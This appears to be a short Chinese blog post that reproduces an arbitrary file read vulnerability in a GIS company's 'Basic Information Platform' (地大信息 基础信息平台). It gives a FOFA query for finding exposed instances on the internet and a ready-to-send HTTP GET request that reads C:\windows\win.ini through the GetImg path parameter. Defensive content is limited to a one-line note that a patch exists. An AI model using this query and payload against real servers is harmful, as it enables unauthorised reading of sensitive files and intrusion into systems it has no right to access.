地大信息-基础信息平台 GetImg 任意文件读取漏洞复现

0x01 漏洞描述:

武汉地大信息工程股份有限公司(简称"地大信息")是一家以地理信息系统(GIS)为核心技术的信息技术服务企业。该公司主要提供包括但不限于空间数据采集与处理、地理信息系统开发、软件定制开发等服务。

旗下的基础信息平台存在任意文件上传漏洞、任意文件读取漏洞,攻击者可通过该漏洞获取服务器权限,获取主机敏感信息。

0x02 搜索语句:

Fofa:body="/SystemManage/BaseProject" || title=="基础信息平台"

0x03 漏洞复现:

复制代码
GET /SystemManage/BaseProject/GetImg?path=C:\windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close

0x04 修复建议:

厂商已发布补丁 请及时修复

相关推荐
程序猿chen3 小时前
量子跃迁:Vue组件安全工程的基因重组与生态免疫(完全体终局篇)
前端·vue.js·git·安全·面试·前端框架·跳槽
ALe要立志成为web糕手3 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
w23617346013 小时前
Apache中间件解析漏洞与安全加固
安全·中间件·apache
PawaAdapter4 小时前
IBC-基于身份标识的密码系统和签名方案
安全
CHTXRT4 小时前
2025第十六届蓝桥杯大赛(软件赛)网络安全赛 Writeup
c语言·网络·web安全·网络安全·蓝桥杯·wireshark
晓数5 小时前
【硬核干货】SonarQube安全功能
安全·sonarqube·sonar
Black_Rock_br6 小时前
智驭未来:NVIDIA自动驾驶安全白皮书与实验室创新实践深度解析
人工智能·安全·自动驾驶
Synfuture阳途7 小时前
网络准入控制系统:2025年网络安全的坚固防线
网络·安全·web安全
陈奕昆8 小时前
6.1腾讯技术岗2025面试趋势前瞻:大模型、云原生与安全隐私新动向
算法·安全·云原生·面试·腾讯
向哆哆9 小时前
Java 安全:如何保护敏感数据?
java·开发语言·安全